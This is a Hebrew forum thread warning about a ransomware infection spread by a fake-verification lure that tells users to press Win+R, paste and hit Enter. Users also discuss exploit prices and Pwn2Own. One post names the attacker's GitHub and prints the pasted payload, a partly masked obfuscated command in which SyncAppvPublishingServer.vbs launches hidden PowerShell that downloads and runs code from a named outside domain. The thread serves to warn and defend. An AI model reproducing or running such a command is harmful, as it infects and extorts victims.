שיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר
-
@עידו300 כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:
אני לא חושב ששימושי פירושו שווה מיליונים.
יש מספיק אנשים שיקנו CVE בהרבה כסף.ומיליונים זה לא הרבה כסף.
@יוסי-רחמים אני לא מכיר האמת את המחירון של cveים, אבל עד כמה שידוע לי לא מודבר על מיליונים, בעשרות או נניח מאות אלפים אתה יכול לקנות וירוס מוכן, לא חושב שcve גולמי אמור לעלות מיליונים (או שגם בזה המחירים עלו).
-
@יוסי-רחמים אני לא מכיר האמת את המחירון של cveים, אבל עד כמה שידוע לי לא מודבר על מיליונים, בעשרות או נניח מאות אלפים אתה יכול לקנות וירוס מוכן, לא חושב שcve גולמי אמור לעלות מיליונים (או שגם בזה המחירים עלו).
פוסט זה נמחק! -
@יוסי-רחמים אני לא מכיר האמת את המחירון של cveים, אבל עד כמה שידוע לי לא מודבר על מיליונים, בעשרות או נניח מאות אלפים אתה יכול לקנות וירוס מוכן, לא חושב שcve גולמי אמור לעלות מיליונים (או שגם בזה המחירים עלו).
@עידו300 יש כנס או יותר נכון תחרות שנקראת Pwn2Own
שמתחרים שםעל דברים בדיוק כאלה,
ויש בעיקר בשנים האחרונות קבוצות תקיפה סיניות גדולות מאוד שמשקיעות כדי להשתתף בו ולנצח.מהסיבה הפשוטה אחרי זה כול ממשלה תקנה מהם את הפרצות שיש להם,
בנוסף לעוד כנסים של מכירה פומבית במקסיקו וספרד.
זה תחום מאוד מרוויח כי יש מדינות ושחקנים שמוכנים להשקיע הרבה כסף כדי להחזיק ביד פרצות שיאפשרו להם לחדור לכול מטרה שהיא.המחירים נעים בין 2 ל 3 מיליון דולר
ולפרצות חמורות יותר כמו wannacry אף עשרות או מאות מיליונים. -
@יוסי-רחמים אני לא מכיר האמת את המחירון של cveים, אבל עד כמה שידוע לי לא מודבר על מיליונים, בעשרות או נניח מאות אלפים אתה יכול לקנות וירוס מוכן, לא חושב שcve גולמי אמור לעלות מיליונים (או שגם בזה המחירים עלו).
טעות שלי, המחירים הרבה פחות יקרים, תראו לדוגמא כאן
https://socradar.io/blog/insights-from-socradars-annual-dark-web-report-2024/
וכאן
https://moneyzine.com/resources/dark-web-statistics/ -
@עידו300 יש כנס או יותר נכון תחרות שנקראת Pwn2Own
שמתחרים שםעל דברים בדיוק כאלה,
ויש בעיקר בשנים האחרונות קבוצות תקיפה סיניות גדולות מאוד שמשקיעות כדי להשתתף בו ולנצח.מהסיבה הפשוטה אחרי זה כול ממשלה תקנה מהם את הפרצות שיש להם,
בנוסף לעוד כנסים של מכירה פומבית במקסיקו וספרד.
זה תחום מאוד מרוויח כי יש מדינות ושחקנים שמוכנים להשקיע הרבה כסף כדי להחזיק ביד פרצות שיאפשרו להם לחדור לכול מטרה שהיא.המחירים נעים בין 2 ל 3 מיליון דולר
ולפרצות חמורות יותר כמו wannacry אף עשרות או מאות מיליונים. -
טעות שלי, המחירים הרבה פחות יקרים, תראו לדוגמא כאן
https://socradar.io/blog/insights-from-socradars-annual-dark-web-report-2024/
וכאן
https://moneyzine.com/resources/dark-web-statistics/@עידו300 לגבי האתר הראשון הוא משאיר מקום ריק בטבלה עבור סחר בzero day
לגבי האתר השני לא ראיתי שהוא מפרט מחירים, בכול מקרה הסטטיסטיקות שלו נראות מוזרות
הוא כותב שהרשת האפילה זה 7% מהאינטרנט .
ושורה אחת אחרי זה הוא כותב שזה 99% מהאינטרנט.
זה דבר שמאוד קשה לגלות מה המחירים / היקיפים שלו כי די ברור שאף אחד לא רוצה לפרט על זה לא הקונים זה ברור,
וגם לא המוכרים כדי לא להרחיק קוניםהנתונים שכן יודעים זה מחקירות עומק של עיתונאים
זה לא בורסה שאתה עושה סקירת שוק.... -
@עידו300 לגבי האתר הראשון הוא משאיר מקום ריק בטבלה עבור סחר בzero day
לגבי האתר השני לא ראיתי שהוא מפרט מחירים, בכול מקרה הסטטיסטיקות שלו נראות מוזרות
הוא כותב שהרשת האפילה זה 7% מהאינטרנט .
ושורה אחת אחרי זה הוא כותב שזה 99% מהאינטרנט.
זה דבר שמאוד קשה לגלות מה המחירים / היקיפים שלו כי די ברור שאף אחד לא רוצה לפרט על זה לא הקונים זה ברור,
וגם לא המוכרים כדי לא להרחיק קוניםהנתונים שכן יודעים זה מחקירות עומק של עיתונאים
זה לא בורסה שאתה עושה סקירת שוק....@cfopuser כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:
הוא כותב שהרשת האפילה זה 7% מהאינטרנט .
ושורה אחת אחרי זה הוא כותב שזה 99% מהאינטרנט.הוא כתב שהדרקנט הוא 5% מהאנטרנט והוא חלק ממה שנקרא deep web רשת עמוקה שהיא 99% אחוז מהאנטרנט, הרשת העמוקה רובה הוא חומר חוקי לחלוטין רק שהוא נסתר מעיני הציבור מסיבות פרטיות או אבטחה כמו מסמכים ממשלתיים, חשבונות בנק, מסמכים רפואיים ועוד.
-
@יונימדיה תופעה מאוד שכיחה בזמן האחרון ובאופן כללי צריך ללמוד לא לעשות שום דבר על המחשב שאתר דורש ממך
הדפדפן לא קשור למחשב שעליו הוא רץ ואין שום סיבה שאתר כלשהו יבקש דבר כזה@מתכנת-חובב כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:
ובאופן כללי צריך ללמוד לא לעשות שום דבר על המחשב שאתר דורש ממך
אבל הוא כן היה צריך להקיש משהו בדפדפן, לא? אז איך הוא היה יכול למנוע את זה?
-
C cfopuser התייחס לנושא זה
-
@cfopuser כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:
הוא כותב שהרשת האפילה זה 7% מהאינטרנט .
ושורה אחת אחרי זה הוא כותב שזה 99% מהאינטרנט.הוא כתב שהדרקנט הוא 5% מהאנטרנט והוא חלק ממה שנקרא deep web רשת עמוקה שהיא 99% אחוז מהאנטרנט, הרשת העמוקה רובה הוא חומר חוקי לחלוטין רק שהוא נסתר מעיני הציבור מסיבות פרטיות או אבטחה כמו מסמכים ממשלתיים, חשבונות בנק, מסמכים רפואיים ועוד.
-
קשור למישהו כאן לא יכול להיות צירוף מקרים...
-
עכשיו ראיתי שפרסם עוד מישהו שכמעט נפל בזה
ורק בגלל שפורסם הנושא הוא ידע לא ללחוץ על זה...
62e1986e-5a9e-4fd3-92c2-02e285959232-צילום מסך.zipהאתר שבו זה קפץ (בלי אחריות - הוספתי כוכביות כדי שלא תלחצו בטעות על הקישור!!
https://www.bslonline*****.co.il/vip/פרסמו כמה שיותר!!!!
שאנשים ידעו לעולם לא ללחוץ קונטרול+וי באתרים! נראה שהנגע הזה פושה במהירות בעוד ועוד אתרים לגטימיים-לכאורה
-
עכשיו ראיתי שפרסם עוד מישהו שכמעט נפל בזה
ורק בגלל שפורסם הנושא הוא ידע לא ללחוץ על זה...
62e1986e-5a9e-4fd3-92c2-02e285959232-צילום מסך.zipהאתר שבו זה קפץ (בלי אחריות - הוספתי כוכביות כדי שלא תלחצו בטעות על הקישור!!
https://www.bslonline*****.co.il/vip/פרסמו כמה שיותר!!!!
שאנשים ידעו לעולם לא ללחוץ קונטרול+וי באתרים! נראה שהנגע הזה פושה במהירות בעוד ועוד אתרים לגטימיים-לכאורה
@בנימין-מחשבים לא נראה לי אני יעבור על כול זה
אבל הנה הגיטהאב של התוקף/איפה שמאוחסן הוירוס (או יותר נכון השלב הבא שלו) למי שמעוניין
https://github.com/paper-skydiver-drv8 -
עכשיו ראיתי שפרסם עוד מישהו שכמעט נפל בזה
ורק בגלל שפורסם הנושא הוא ידע לא ללחוץ על זה...
62e1986e-5a9e-4fd3-92c2-02e285959232-צילום מסך.zipהאתר שבו זה קפץ (בלי אחריות - הוספתי כוכביות כדי שלא תלחצו בטעות על הקישור!!
https://www.bslonline*****.co.il/vip/פרסמו כמה שיותר!!!!
שאנשים ידעו לעולם לא ללחוץ קונטרול+וי באתרים! נראה שהנגע הזה פושה במהירות בעוד ועוד אתרים לגטימיים-לכאורה
@בנימין-מחשבים כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:
עכשיו ראיתי שפרסם עוד מישהו שכמעט נפל בזה
ורק בגלל שפורסם הנושא הוא ידע לא ללחוץ על זה...אני שמח שהפוסטים כאן עזרו ליהודי.
מחר אני יהיה על המחשב הנגוע. נדווח על כל צעד חריג... -
עכשיו ראיתי שפרסם עוד מישהו שכמעט נפל בזה
ורק בגלל שפורסם הנושא הוא ידע לא ללחוץ על זה...
62e1986e-5a9e-4fd3-92c2-02e285959232-צילום מסך.zipהאתר שבו זה קפץ (בלי אחריות - הוספתי כוכביות כדי שלא תלחצו בטעות על הקישור!!
https://www.bslonline*****.co.il/vip/פרסמו כמה שיותר!!!!
שאנשים ידעו לעולם לא ללחוץ קונטרול+וי באתרים! נראה שהנגע הזה פושה במהירות בעוד ועוד אתרים לגטימיים-לכאורה
@בנימין-מחשבים אחד החמודים היוצר של זה אפי' השאיר הערות הסבר על הקוד
# Making temporary changes that will revert later # Partial implementation below, non-blocking # Waiting for service heartbeat before continuing # Retry logic removed (no longer needed) SyncAppvPublishingServer.vbs "n;saps $env:SystemRoot\SysWOW64\WindowsPowerShell\v1.0\?owershell.??? -Arg '-NoP -C & (gal i*************************************************************************************************************?*********************x)(& (gcm *************************************************************************************************************************estM*****************************************************) docker-void.mesh-api-cloud-secure.in.net/fedora-win11);while(1){sleep 60}' -Wi Hidden" # Only used in fallback scenarios # Handles backend sync issue on older hosts # Last-minute fix - unverified but consistent # Watching for inconsistencies in runtime behavior while ($false) { $assembly = [System.Reflection.Assembly]::LoadWithPartialName("System.Xml"); Write-Debug "Loaded Assembly FullName: $($assembly.FullName)" } (Get-Culture).Name | Out-Null -
עכשיו ראיתי שפרסם עוד מישהו שכמעט נפל בזה
ורק בגלל שפורסם הנושא הוא ידע לא ללחוץ על זה...
62e1986e-5a9e-4fd3-92c2-02e285959232-צילום מסך.zipהאתר שבו זה קפץ (בלי אחריות - הוספתי כוכביות כדי שלא תלחצו בטעות על הקישור!!
https://www.bslonline*****.co.il/vip/פרסמו כמה שיותר!!!!
שאנשים ידעו לעולם לא ללחוץ קונטרול+וי באתרים! נראה שהנגע הזה פושה במהירות בעוד ועוד אתרים לגטימיים-לכאורה
@בנימין-מחשבים כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:
שאנשים ידעו לעולם לא ללחוץ קונטרול+וי באתרים! נראה שהנגע הזה פושה במהירות בעוד ועוד אתרים לגטימיים-לכאורה
האתר ביקש ממנו לבצע:
Win + R → Ctrl + V → Enter, מה שפתח חלון Run והדביק פקודה שהייתה ב‑clipboard שלו.
סתם ללחוץ cntl v מה הבעיה?
 { const baseUrl = "https://www.google.co.il/search?q=site:mitmachim.top"; const m = location.pathname.match(/^\/(topic|category)\/(\d+)/); const type = m ? m[1] : null; const id = m ? m[2] : null; let searchInput; function search(path = "") { const query = searchInput.value.trim(); if (query) { window.open(`${baseUrl}${path}%20${encodeURIComponent(query)}`, "_blank"); } } let buttons = {}; buttons.searchAll = { id: "bb-search-all", label: `חיפוש ${type ? "בכל הפורום" : ""}`, className: type ? "btn-secondary" : "btn-primary", callback: () => search(), }; if (type === "topic") { buttons.searchTopic = { label: "חיפוש בנושא זה", className: "btn-primary", callback: () => search(`/topic/${id}`), }; } else if (type === "category") { buttons.searchCategory = { label: "חיפוש בקטגוריה זו", className: "btn-primary", callback: () => search(`/category/${id}`), }; } buttons.cancel = { label: "ביטול", className: "btn-default", "data-bs-dismiss": "modal" }; const dialog = bootbox.dialog({ title: '<div style="text-align:center;"><img src="/assets/uploads/files/1625950269825-mt-google.png" width="400" alt="חיפוש בגוגל"></div>', message: '<input id="bb-inp" class="bootbox-input bootbox-input-text form-control" placeholder="הקלידו כדי לחפש בגוגל" autocomplete="off"/>', buttons, backdrop: true, show: true, onEscape: true }); dialog.on("shown.bs.modal", function () { searchInput = document.getElementById("bb-inp"); if (searchInput) { searchInput.focus(); searchInput.addEventListener("keydown", function (e) { if (e.key === "Enter") { e.preventDefault(); const query = this.value.trim(); if (query) { search(); dialog.modal("hide"); } } else if (e.key === "Escape") { e.preventDefault(); dialog.modal("hide"); } }); } const searchAllButton = document.getElementById("bb-search-all"); if (searchAllButton) { searchAllButton.title = "לחצו על אנטר כדי לחפש"; } }); })(); void 0;){kind=link}